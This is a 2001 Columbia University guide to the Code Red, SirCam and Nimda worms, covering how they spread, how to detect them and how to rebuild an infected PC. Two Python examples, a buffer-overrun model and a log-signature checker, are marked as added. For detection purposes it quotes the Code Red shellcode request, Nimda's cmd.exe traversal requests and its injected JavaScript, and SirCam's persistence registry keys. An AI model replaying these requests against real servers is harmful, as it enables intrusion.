Jeffrey Altman
The Kermit Project,
Academic Information Systems
Columbia University
jaltman@columbia.edu
October 23, 2001
© copyright by the Trustees of Columbia University in the City of New York.
The document to which this notice is attached is protected by copyright owned in whole or in principal part by The Trustees of Columbia University in the City of New York ("Columbia"). You may download the document for reference and research purposes only. COLUMBIA MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, WITH RESPECT TO THE DOCUMENT, OR ANY PART THEREOF, INCLUDING ANY WARRANTIES OF TITLE, NONINFRINGEMENT OF COPYRIGHT OR PATENT RIGHTS OF OTHERS, MERCHANTABILITY, OR FITNESS OR SUITABILITY FOR ANY PURPOSE.
Distribution and/or alteration by not-for-profit research or educational institutions for their local use is permitted as long as this notice is kept intact and attached to the document.
Any other distribution of copies of the document or any altered version thereof is expressly prohibited without prior written consent of Columbia.
For permission requests, licensing proposals, questions, or further information, please contact publications@columbia.edu.
This document borrows heavily from text included in CERT advisories, especially in the descriptions of the viruses and worms. This is a work in progress: significant amounts of work still need to be done on it, and some sections are almost empty. It will be updated on a continuing basis until it is completed. Send questions and comments to the author.
 1. Introduction
    1.1.  What is a Virus?
    1.2.  What is a Worm?
 2. How Modern Viruses and Worms Spread
    2.1.  Human Curiosity
    2.2.  Buffer Overflows
    2.3.  Design Flaws
    2.4.  Ease-of-Use Features
    2.5.  Embedded Scripts
    2.6.  File Sharing
    2.7.  Back Doors
 3. What Viruses and Worms Can Do Once They Have Infected Your Computer
 4. Current Virus/Worm Activity
    4.1.  Code Red Variants
    4.2.  W32/Sircam
    4.3.  W32/Nimda
 5. Known vulnerabilities in Windows Operating Systems
 6. How to Determine If You Are Infected
 7. How to Recover If You Are Infected
    7.1.  Remove the Computer from the Network
    7.2.  Using a Virus-Specific Removal Tool
    7.3.  Using Norton Anti-virus to Clean the Computer
    7.4.  Backing Up Data Files
    7.5.  Reinstalling the Operating System
          7.5.1. Using the Recovery CD
          7.5.2. Installing the Operating System
    7.6.  Shutting Down Services (NT, 2000, XP)
    7.7.  Connecting to the Network
    7.8.  Applying Patches to the Operating System and Internet Explorer
          7.8.1. Windows 2000
          7.8.2. Windows NT 4
          7.8.3. Windows ME
          7.8.4. Windows 98 Second Edition
          7.8.5. Windows 98
          7.8.6. Windows 95 OSR2
          7.8.7. Windows 95
    7.9.  Installing and Patching Microsoft Office
          7.9.1. MS Office XP
          7.9.2. MS Office 2000
          7.9.3. MS Office 97
          7.9.4. MS Office 95
    7.10. Install Norton Anti-virus
    7.11. Restoring Disabled Services (NT, 2000, XP)
    7.12. Restore Backed Up Data
    7.13. Install Other Applications
    7.14. Additional Precautions
 8. How to Prevent Reinfection
    8.1.  Subscribe to Mailing Lists for Notification of Vulnerabilities
    8.2.  Behavior Modification
          8.2.1. Strong Passwords
          8.2.2. Preventing Password Theft
          8.2.3. Ignore Unexpected E-mail Attachments
          8.2.4. Beware of the unexpected when browsing the web
    8.3.  System Tuning
          8.3.1. Windows 95, 98, 98SE, ME
          8.3.2. Windows NT, 2000, XP
                 8.3.2.1. Baseline Security Checklists
                 8.3.2.2. IIS Lockdown Tool
                 8.3.2.3. Hotfix Network Check
                 8.3.2.4. Microsoft Personal Security Advisor website
                 8.3.2.5. IIS URL Scan Tool
    8.4.  Web Sites to Monitor
          8.4.1. Windows Updates
          8.4.2. MS Office Updates
          8.4.3. Microsoft Security
          8.4.4. NTBugTraq
          8.4.5. Symantec Security Response
          8.4.6. Computer Emergency Response Team (CERT)
    8.5.  Establishing a Backup Procedure
    8.6.  Personal Firewalls
    8.7.  Configuring Norton Anti-virus to Protect Your Computer
          8.7.1. Browsers and Downloads
          8.7.2. File Scans
          8.7.3. E-mail Scans
 9. Alternatives to Microsoft Products
    9.1.  IIS
    9.2.  Internet Explorer
    9.3.  MS Outlook
    9.4.  MS Office
    9.5.  Windows
10. Further Reading
    10.1. Books
          10.1.1. Hacking
          10.1.2. System Management
          10.1.3. Security Policy
Over the last year the Internet has been hit by an ever increasing number of threats from viruses and worms. Not only has the number of threats increased, but so has their sophistication. Gone are the days when a virus received on a disk from a friend, or even in an e-mail or news post, would limit its damage to the local machine. The latest breed of viruses takes advantage of the 24/7 connectivity of computers at home, in the office, and even those with mobile links. Once infected, the machine is used to further spread the virus or worm over the network.
Frequently, the virus or worm installs a back door to allow the computer to be further infiltrated at a later time. Machines that have been compromised in this manner can have all their data read or modified, and the computer can be used in a coordinated denial of service attack against other hosts on the Internet, or worse. There can and probably will be deliberate attempts to destroy businesses, to compromise government security, to commit espionage, sabotage, and other kinds of crimes. The degree to which the economy and government depend on computers attached to public networks is the degree to which they are vulnerable.
This all sounds frightening and it is. But it is only the tip of the iceberg. What is not seen is the ever increasing cost in human hours spent trying to reduce the spread of these viruses/worms; the time spent rebuilding computer systems from scratch; and the time spent trying to guess what data might have been compromised and then ensuring that any data that might have been compromised is altered or otherwise secured.
Viruses and worms are spread in an ever-increasing number of ways, limited only by the imagination of their authors. Each virus builds on the experience of previous viruses to increase the rate at which it spreads. Viruses and worms now often incorporate more than one of the following methods:
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
| 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 |
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
^
0x40032492
A separate buffer is allocated for each logical value that is addressed by a computer program. The memory of the computer is therefore broken up into a series of buffers.
+-------+---+-----------------+-----+-------------------+----------+
| buf1  |b2 | buffer3         |buf4 | unallocated       | buf5     |
+-------+---+-----------------+-----+-------------------+----------+
A buffer overrun occurs when a computer program does not check the size of a buffer before writing into it and then writes more data into a buffer than will fit. When this occurs the extra data is written into the memory allocated to adjacent buffers. This overwrites the data stored in those buffers.
If someone knows that it is possible to force a program to overrun its buffers, and they can determine the purpose of the overrun buffers, it is possible to cause the program to misbehave in well defined ways. This can be taken advantage of either to cause a service or application to crash, or, under certain circumstances, to cause the program to execute arbitrary commands on behalf of the attacker.
Buffer overrun attacks can occur against any type of computer application that accepts data from an external source. This includes all network-based services that accept connections, such as web servers, file sharing services, remote procedure call services, and remote shell services. On the client side, potential victims are web browsers, e-mail clients, and any other application that processes data files.
When buffer overruns are used to cause services to crash and therefore become unavailable this is described as a "denial of service attack". When the overrun is used to allow a third party to execute arbitrary commands as the root or administrative user, the attack is referred to as a "root hack".
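The model below illustrates the point of this section and is an added example, not code from the original document: a flat block of memory holding adjacent buffers laid out like the picture above, one routine that copies without checking the buffer size, and the corrected routine that refuses oversize input. The layout, the 0xAA fill value and the "A" payload are constructed for the illustration.

```python
# Constructed model of "memory is a series of adjacent buffers": one flat
# block in which several logical buffers are allocated back to back.
# Added illustration, not code from the document.
FILL = 0xAA  # every byte starts as 0xAA so an overwrite is easy to spot
MEMORY_SIZE = 32

# Layout following the document's picture: buf1 is immediately followed by b2.
LAYOUT = {
    "buf1": (0, 8),      # (offset, size)
    "b2": (8, 4),
    "buffer3": (12, 16),
}


def write_unchecked(memory: bytearray, name: str, data: bytes) -> None:
    """The defect: copy data into the buffer without asking whether it fits.

    Bytes beyond the buffer's size spill into whatever was allocated next.
    Writing past the end of the whole block raises IndexError, the model's
    equivalent of the program crashing.
    """
    offset, _size = LAYOUT[name]
    for i, byte in enumerate(data):
        memory[offset + i] = byte


def write_checked(memory: bytearray, name: str, data: bytes) -> bool:
    """The fix: check the size first and refuse input that does not fit.

    Returns False (and writes nothing) on oversize input, True otherwise.
    """
    offset, size = LAYOUT[name]
    if len(data) > size:
        return False
    memory[offset:offset + len(data)] = data
    return True


def buffer_intact(memory: bytearray, name: str) -> bool:
    """True if every byte of the named buffer still holds the fill value."""
    offset, size = LAYOUT[name]
    return all(b == FILL for b in memory[offset:offset + size])


def run_demo(payload_len: int = 12) -> dict:
    """Aim payload_len bytes of 'A' at the 8-byte buf1 through both writers.

    Reports whether the neighbouring buffer b2 survived in each case.
    """
    payload = b"A" * payload_len

    unchecked = bytearray([FILL]) * MEMORY_SIZE
    write_unchecked(unchecked, "buf1", payload)

    checked = bytearray([FILL]) * MEMORY_SIZE
    accepted = write_checked(checked, "buf1", payload)

    return {
        "unchecked_b2_intact": buffer_intact(unchecked, "b2"),
        "checked_accepted": accepted,
        "checked_b2_intact": buffer_intact(checked, "b2"),
    }


if __name__ == "__main__":
    print(run_demo())     # 12 bytes into an 8-byte buffer
    print(run_demo(8))    # payload that fits: both writers behave
```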
Perhaps replace Unicode example with another design flaw from Microsoft list. The argument against doing this is that this Unicode flaw was used by the W32/Nimda virus to attack IIS.
In recent months more sophisticated use of file sharing has been taking place. Virus writers are taking advantage of the ability to automate the establishment of new file share connections to attack new computer systems. This can be done either by querying the computer system for a list of related computer systems on which the current credentials may be accepted, or by attempting random connections in the hope of finding a computer system with open file shares that are not protected with strong passwords. Once a file share has been established, the virus/worm attempts to install itself in locations where it is likely to be executed. This can be done by either replacing or modifying executable files. Other methods include copying curiously named programs, or application data files that contain auto-executing scripts, in the hope that the user's curiosity will cause him to open or execute the file while trying to determine where it came from.
If appropriate access is given to the account used to mount the share it is even conceivable that the file share could be used to adjust system configuration information such as file and icon associations.
Back doors have become so common they are now a reasonable means of spreading additional worms. Since back doors may make use of standard computer system services they are not always detectable by the use of anti-virus programs. Nor are they closed automatically when vendor supplied patches to operating systems and applications are applied to the computer system.
The capabilities of viruses and worms are only limited by the creativity of the author and the privileges the virus is capable of acquiring on the infected computer system. Many PC based operating systems have no notion of user or process based privileges. On operating systems such as DOS, Windows 3.x, Windows 95/98/ME, OS/2 and MacOS, the virus is capable of performing any function that is installed on the computer. The virus can add, modify, delete or replace files; send e-mails; print documents; make phone calls; establish connections to other computers; capture passwords; read credit card information from electronic wallets; extract private keys used for authenticating to external hosts; and anything else the virus author can think of.
On operating systems that do provide user or process based privileges, such as Windows NT/2000/XP, Unix/Linux and MacOS X, the virus will have only those capabilities assigned to the process or user that was used to launch the virus in the first place. If the user or process has very limited capabilities on the computer, then the virus will have very limited capabilities for causing damage. It is for this reason that it is important that users of these operating systems do not log in on a regular basis as the Administrator (or root) account. It is equally important that the accounts used to launch services such as web servers have the minimum capabilities necessary to provide the required functionality. Included in the list of capabilities are permissions to access the file systems of the local machine. Using the web server as an example: other than the files the web server requires in order to run and the files it is serving to web browsers, there is no reason for the web server to have access to any other files or devices on the machine. Therefore, the file system should be configured to deny the account used to start the web server access to all unnecessary files.
The vast majority of virus/worm activity in the last six months has been targeted against the operating systems and applications of Microsoft Corp. This is not to say that there have not been a significant number of vulnerabilities discovered in competing operating systems. However, Microsoft's products and users have been targeted due to their overwhelming majority of the marketplace and the huge number of known exploits that have been discovered and left unpatched on end-user systems. The following sections summarize the issues surrounding the most frequently seen viruses as of the current writing.
http://www.cert.org/advisories/CA-2001-13.html
http://www.cert.org/advisories/CA-2001-19.html
http://www.cert.org/advisories/CA-2001-23.html
Code Red (and Code Red II and Code Blue) are all variants of a worm that attempts to spread by taking advantage of a vulnerability in the Microsoft Internet Information Service (IIS). IIS is Microsoft's professional strength web server. The vulnerability is a Buffer Overrun in the Indexing Service DLL. Vulnerable platforms include:
Other devices including Cisco 600 DSL routers were adversely affected by the attacks even though they could not be infected.
CERT reports that the time to infect all vulnerable IIS servers, given the rapid propagation of this worm, is approximately 19 hours from the first infection. It should be noted that IIS is often running on desktop computers without the knowledge of the user. This can be the case either because IIS was installed in an active state by an OEM or during an upgrade, or because the user installed and activated all features during the installation of the operating system but did not realize the risks involved with running unmanaged services.
The Code Red worm attack proceeds as follows:
http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml
HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
Servers configured with a language that is not English, and those infected with the later variant, do not experience any change in the served content. Other worm activity on a compromised machine is time sensitive; different activity occurs based on the date (day of the month) of the system clock:
The "Code Red" worm activity can be identified on a machine by the presence of the following string in web server log files:
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
Different variants of the worm use different letters to replace the series of 'N's. The presence of this string in a log file does not necessarily indicate compromise. Rather, it only implies that a "Code Red" worm attempted to infect the machine.
A host running an active instance of the original "Code Red" worm scans random IP addresses on port 80/TCP looking for other hosts to infect.
The text of the "... Hacked by Chinese!" message is stored exclusively in memory and is not written to disk. Therefore, searching for the text of this page in the file system may not detect compromise. Since the worm resides entirely in memory a reboot of the machine purges it from the system. However, it is important to note that the vulnerability:
http://www.cert.org/advisories/CA-2001-13.html
allows arbitrary code to be executed in the Local System security context that gives the attacker complete control of the compromised server.
The only precondition for exploiting this vulnerability is that an IIS server is running with script mappings for Internet Data Administration (.ida) and Internet Data Query (.idq) files. The Indexing Services do not need to be running. As stated by Microsoft in MS01-033:
"The buffer overrun occurs before any indexing functionality is requested. As a result, even though idq.dll is a component of Index Server/Indexing Service, the service would not need to be running in order for an attacker to exploit the vulnerability. As long as the script mapping for .idq or .ida files were present, and the attacker were able to establish a web session, he could exploit the vulnerability."
The Code Red II variant is known to exploit this vulnerability to install a back door so that control of the machine may be regained after a reboot or application of a patch. It is reported that the presence of the back door is propagated to the hacker community via Internet Relay Chat (IRC).
Patches to the IIS vulnerability are available from Microsoft. Microsoft is also making available an IIS Lockdown tool to remove unused functionality and alter the privileges available to attackers.
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
http://www.microsoft.com/technet/support/kb.asp?ID=Q300972
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/locktool.asp
Microsoft has released a "Tool to Remove Obvious Effects of the Code Red II Worm"
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/redfix.asp
It should be noted that Microsoft states in the above link (case as quoted):
"THE TOOL ONLY ELIMINATES THE EFFECTS OF THE CODE RED II WORM. IT DOES NOT ELIMINATE THE EFFECT OF OTHER VARIANTS OF THE WORM.
"IF THE WORM HAS INFECTED YOUR SYSTEM, YOUR SYSTEM HAS BEEN OPENED TO ADDITIONAL FORMS OF ATTACK. THIS TOOL ONLY ELIMINATES THE DIRECT EFFECTS OF THE WORM - IT DOES NOT ELIMINATE ANY ADDITIONAL DAMAGE THAT OTHER ATTACKS MAY HAVE CAUSED WHILE YOUR SERVER WAS INFECTED.
"WHILE THIS TOOL IS USEFUL IN ELIMINATING THE EFFECTS OF THE CODE RED II WORM ON INTERNAL SERVERS THAT ARE PROTECTED FROM THE INTERNET BY A ROUTER OR FIREWALL, MICROSOFT RECOMMENDS THAT INFECTED INTERNET-FACING SERVERS BE REBUILT ACCORDING TO THE GUIDELINES PUBLISHED ON THE CERT WEB SITE. IN ADDITION, ANY OTHER SERVERS THAT ARE JUDGED TO HAVE BEEN PUT AT RISK BY THEIR PROXIMITY TO INFECTED SERVERS SHOULD ALSO BE REBUILT RATHER THAN BEING PLACED BACK INTO SERVICE."
http://www.cert.org/advisories/CA-2001-22.html
W32/SirCam is a virus that spreads through e-mail and unprotected network shares. Once the virus has been executed on a system it may reveal or delete sensitive information. All Microsoft Windows operating systems are vulnerable. The SirCam virus can disable the auto-protect features of Anti-virus programs by modifying entries in the Windows registry. In order to detect the SirCam virus, the anti-virus programs must be used to perform a full scan of all drives.
The virus can appear in an email message written in either English or Spanish with a seemingly random subject line. All known versions of W32/Sircam use the following format in the body of the message:
Where [middle line] is one of the following:
Users who receive copies of the malicious code through electronic mail might recognize the sender. We strongly encourage users to avoid opening attachments received through electronic mail, regardless of the sender's name, without prior knowledge of the origin of the file or a valid digital signature.
The email message contains an attachment whose name matches the subject line and has a double file extension (e.g. subject.ZIP.BAT or subject.DOC.EXE). The CERT/CC has confirmed reports that the first extension may be .DOC, .XLS, or .ZIP. Anti-virus vendors have referred to additional extensions, including .GIF, .JPG, .JPEG, .MPEG, .MOV, .MPG, .PDF, .PNG, and .PS. The second extension is .EXE, .COM, .BAT, .PIF, or .LNK. The attached file contains both the malicious code and the contents of a file copied from an infected system.
When the attachment is opened, the copied file is extracted to both the %TEMP% folder (usually C:\WINDOWS\TEMP) and the Recycled folder on the affected system. The original file is then opened using the appropriate default viewer while the infection process continues in the background.
It is possible for the recipient to be tricked into opening this malicious attachment, since the file appears without the .EXE, .BAT, .COM, .LNK, or .PIF extension if the "Hide file extensions for known file types" option is enabled in Windows. See IN-2000-07 for additional information on the exploitation of hidden file extensions.
W32/Sircam includes its own SMTP client capabilities, which it uses to propagate via email. It determines its recipient list by recursively searching for email addresses contained in all *.WAB (Windows Address Book) files in the %SYSTEM% folder. Additionally, it searches the folders referred to by the Registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
for files containing email addresses. All addresses found are stored in SC??.DLL or S??.DLL files hidden in the %SYSTEM% folder.
W32/Sircam first attempts to send messages using the default email settings for the current user. If the default settings are not present, it appears to use one of the following SMTP relays:
If W32/Sircam detects Windows networking shares with write access, it:
If the share contains a Windows folder, it also:
When installed on a victim machine, W32/Sircam installs a copy of itself in two hidden files:
Installing in Recycled may hide it from anti-virus software since some do not check this folder by default.
Based on external analyses, there is also a probability that W32/Sircam will copy itself to the %SYSTEM% folder as ScMx32.exe. In that case, another copy is created in the folder referred to by the Registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup
(the current user's personal startup folder). The copy created in that location is named Microsoft Internet Office.exe. When the affected user next logs in, this copy of W32/Sircam is started automatically.
The registry entry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Driver32
is set to %SYSTEM%\SCam32.exe so that W32/Sircam runs automatically at system startup.
The registry entry HKEY_CLASSES_ROOT\exefile\shell\open\command is set to:
"C:\Recycled\SirC32.exe" "%1" %*"
which causes W32/Sircam to execute whenever another executable is run.
A new registry entry, HKEY_LOCAL_MACHINE\Software\SirCam, is created to store data required by W32/Sircam during execution.
W32/Sircam searches for filenames with .DOC, .XLS, .ZIP extensions in the folders referred to by the Registry keys:
While the personal folder may vary with configuration, it is often set to:
\My Documents or \Windows\Profiles\%username%\Personal
A list of these files is stored in %SYSTEM%\scd.dll.
W32/Sircam attaches its own binary to selected files it finds and stores the combined file in the Recycled folder.
W32/Sircam can have a direct impact on both the computer that was infected as well as those with which it communicates over email:
The Nimda virus/worm is the worst that we have seen with regard to the rate of infection and network traffic generated by the attacks. This is due to the large number of vulnerabilities and attack paths used to spread the worm. This worm can affect all Microsoft Windows operating systems. The worm opens the machine to further attacks by using the built-in file sharing capabilities to open all drives on the machine to anonymous users.
The attack vectors can be summarized as follows:
Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as a result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload is automatically triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.
The email message delivering the Nimda worm appears to also have the following characteristics:
These files are passed through a simple pattern matcher that collects strings that look like email addresses. These addresses then receive a copy of the worm as a MIME-encoded email attachment. Nimda stores the time the last batch of emails was sent in the Windows registry, and every 10 days repeats the process of harvesting addresses and sending the worm via email.
Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:
The infected client machine attempts to transfer a copy of the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable. Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml). When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended to every one of these web-related files:
  <script language="JavaScript">
  window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
  </script>
This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system.
In order to further expose the machine, the worm:
Furthermore, the Nimda worm infects existing binaries on the system by creating Trojan horse copies of legitimate applications. These Trojan horse versions of the applications first execute the Nimda code (further infecting the system and potentially propagating the worm), and then complete their intended function.
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.
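The following log checker is an added example, not code from the document or from CERT, that turns the Code Red log string from the earlier section and the Nimda request list above into signatures and runs them over constructed sample log lines. The simplified "date time client method uri status" log layout, the 192.0.2.x client addresses and the label names are assumptions made for the illustration; the percent-encoded spellings of the malformed UTF-8 separators are added alongside the raw bytes shown above.

```python
import re
from collections import Counter

# Signatures derived from the request strings quoted above: the Code Red
# /default.ida probe and the Nimda root.exe / cmd.exe requests. Added
# illustration, not code from the document or from CERT.
CODE_RED_PROBE = re.compile(
    r"^/default\.ida\?(?P<pad>[A-Za-z])(?P=pad){20,}.*%u", re.IGNORECASE
)
# The first four Nimda entries: requests for the root.exe copies and the
# /c and /d virtual roots that Code Red II leaves behind.
CRII_BACKDOOR_PROBE = re.compile(
    r"(?:/root\.exe|^/[cd]/winnt/system32/cmd\.exe)", re.IGNORECASE
)
# Directory traversal: ".." followed by a percent-escaped or malformed-UTF-8
# separator, eventually reaching cmd.exe. Raw \xc0/\xc1 bytes appear as-is
# in the log (decode it as latin-1); percent-encoded spellings are included
# as well.
TRAVERSAL_PROBE = re.compile(
    r"\.\.(?:%5c|%2f|%35c|%c0%af|%c1%1c|%c1%9c|\xc0|\xc1).*cmd\.exe",
    re.IGNORECASE,
)


def classify(uri: str) -> str:
    """Label one requested URI.

    Any label other than 'normal' means an infected host tried to infect
    this server, not that the attempt succeeded (see the note above).
    """
    if CODE_RED_PROBE.search(uri):
        return "code-red-probe"
    if CRII_BACKDOOR_PROBE.search(uri):
        return "code-red-ii-backdoor-probe"
    if TRAVERSAL_PROBE.search(uri):
        return "iis-traversal-probe"
    return "normal"


def summarize(lines):
    """Count labels over log lines and collect the clients that sent probes.

    Expects the constructed 'date time client method uri status' layout
    used by SAMPLE_LOG; splits on single spaces so control bytes inside a
    URI are not treated as whitespace.
    """
    counts = Counter()
    sources = set()
    for line in lines:
        fields = line.split(" ")
        if len(fields) < 6:
            continue  # malformed line: skip rather than guess
        client, uri = fields[2], fields[4]
        label = classify(uri)
        counts[label] += 1
        if label != "normal":
            sources.add(client)
    return {"counts": dict(counts), "sources": sorted(sources)}


# Constructed sample log; 192.0.2.0/24 is the documentation address range.
SAMPLE_LOG = [
    "2001-09-18 09:14:07 192.0.2.10 GET /default.ida?" + "N" * 60
    + "%u9090%u6858%ucbd3%u7801 200",
    "2001-09-18 09:14:09 192.0.2.11 GET /default.ida?" + "X" * 60
    + "%u9090%u6858%ucbd3%u7801 200",
    "2001-09-18 09:15:01 192.0.2.12 GET /scripts/root.exe?/c+dir 404",
    "2001-09-18 09:15:01 192.0.2.12 GET /c/winnt/system32/cmd.exe?/c+dir 404",
    "2001-09-18 09:15:02 192.0.2.12 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 404",
    "2001-09-18 09:15:02 192.0.2.12 GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir 404",
    "2001-09-18 09:15:03 192.0.2.12 GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 404",
    "2001-09-18 09:16:00 192.0.2.20 GET /index.html 200",
]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line.split(" ")[4]), line[:60])
    print(summarize(SAMPLE_LOG))
```

A 404 on these requests means the probe missed; a 200 on a cmd.exe or root.exe request is the line that warrants the rebuild procedure described later in this document.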
Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. In the case where a client is compromised, the worm is run with the same privileges as the user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet sites.
The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines.
The complete list of vulnerabilities for all Microsoft products can be found at the Microsoft TechNet web site:
http://www.microsoft.com/technet/security/current.asp
The best way to determine if you are infected is to install Norton Anti-Virus and scan all files (not just the executables) with an up to date set of virus definition files. Current virus definition updates can be downloaded from:
http://www.symantec.com/avcenter/download/pages/US-NNT.html
Other ways of finding out you are infected are:
In the cases of all viruses and worms that do not leave back doors on your computer it is perfectly fine to download a revised anti-virus definition for your machine and allow it to delete or (if possible) clean the affected files. Under some circumstances you may have to uninstall and reinstall some of your applications if required files have been tampered with.
Unfortunately, this is not acceptable when the attacking virus contains a known back door. When a back door is present on the machine it is not possible for the anti-virus definition author to know what to look for in order to clean or delete additional tools that have been installed on the machine via the backdoor. The additional tools may be installed during a subsequent attack unrelated to the initial infection. Under these circumstances we strongly urge that a complete reformat and reinstall of the machine take place. Otherwise, your privacy, the integrity of your data, and the security of the machines you connect to from this infected system may very well be at risk.
We realize that it is very likely that you do not want, or are not able, to throw out all of your data. To do so would be the equivalent of burning down the house you grew up in. The closets and attics of your hard drive are most likely filled with documents, pictures, and other memorabilia that you do not want to destroy. Therefore it is important for you to clean your data to the best of your ability before backing it up, reinstalling your operating system and applications, and then restoring your data.
A summary of the recommended process is as follows:
This is likely to take several hours and requires several tools:
We understand that time can be more valuable than money. If we did not believe these steps were absolutely necessary to ensure the integrity of your data, preserve the safety of the network community, and ensure the security of the Columbia University computing environment we would not be insisting that they be performed.
It is unfortunate that the ownership and use of a personal computer is not as maintenance free as a camera, VCR or toaster. Instead a personal computer requires about as much attention as a 1950s automobile.
NOTE: These tools can only remove the obvious symptoms of the virus/worm. If the virus/worm installs a back door, the removal tool can close the back door, but it cannot remove anything that was installed using the back door.
The following procedure can be used only if we can assume that the infected computer does not contain a virus that is able to disable or corrupt the anti-virus program.
Norton AntiVirus is a virus scanning program developed by Symantec Corporation. AcIS has purchased a site license for the Columbia University community. You can download it from:
http://www.columbia.edu/acis/software/nav/
or install it from the AcIS Internet Software CD-ROM. The AcIS Internet Software CD 8.0 for Fall 2001 is available for $10.00 in the following locations:
If you have not already installed the Anti-virus program you should purchase the AcIS CD (or borrow it from a friend.)
You should also download the latest Virus Definitions file using an uninfected computer. Three diskettes are required. The web address is:
http://www.symantec.com/avcenter/download/pages/US-NNT.html
When you purchase the Norton Anti-virus CD, the program can be executed off the CD in case the machine has been infected. Can this be done from the AcIS CD? Can 102 Philosophy distribute diskettes with the latest virus definitions so that users do not have to connect to the network?
This section is flawed. I've been going through numerous scenarios in which the next virus has code to use the same hooks anti-virus programs use in order to prevent the installation or use of anti-virus programs. It does not actually need to uninstall the anti-virus program or destroy it; all it needs to do is corrupt the contents of the virus definition files (VDF). Since there are a relatively small number of VDF formats out there, this would be fairly easy to do. Once the VDFs become unreadable it would be impossible to detect or disinfect the computer with the most common tools. In that case, the data must be removed onto removable media and disinfected on a previously uninfected computer.
This process takes care of any known viruses. However, it does not protect you against any additional hacker tools that were installed by a back door.
Once you have selected all the files to backup you can copy them to a floppy or other removal media. If you have a CD-R drive and appropriate software you can write them to a CD-R. If you have a tape drive, you can back them up to tape.
Remember, only data files can be backed up. When the data files have been backed up and verified you may want to take the added precaution of scanning the backup copies (when possible) with Norton Anti-virus on an uninfected machine.
Be sure to use a backup method that lets you restore selected files after re-installing the operating system.
Once the backup is complete you can go ahead and re-install the operating system.
There are two legal ways the operating system was installed on your computer:
Since you are installing an operating system from scratch you might want to consider upgrading your operating system to a newer version.
This section needs to be expanded to contain os specific details.
The directions for each operating system (Windows 95, 98, 98SE, ME, NT, 2000, XP) are slightly different. The general rule is that when installing the operating system you want to repartition and reformat the drives the operating system is going to be installed onto. If you are installing NT, 2000, or XP, use the NTFS file system instead of FAT, since NTFS supports file permissions and FAT does not.
If you need to create installation diskettes from the CD media use the commands:
DOS: WINNT.EXE /OX
32-bit Windows: WINNT32.EXE /OX
During installation defer any questions about configuring the network or joining a domain. Do not install features you do not absolutely require. In particular, do not install Personal Web Server or Internet Information Service. If you are installing Windows 95/98/ME, do not install the File and Print Sharing services unless you require the ability to share your drives.
Insert instructions for turning off services on each OS version.
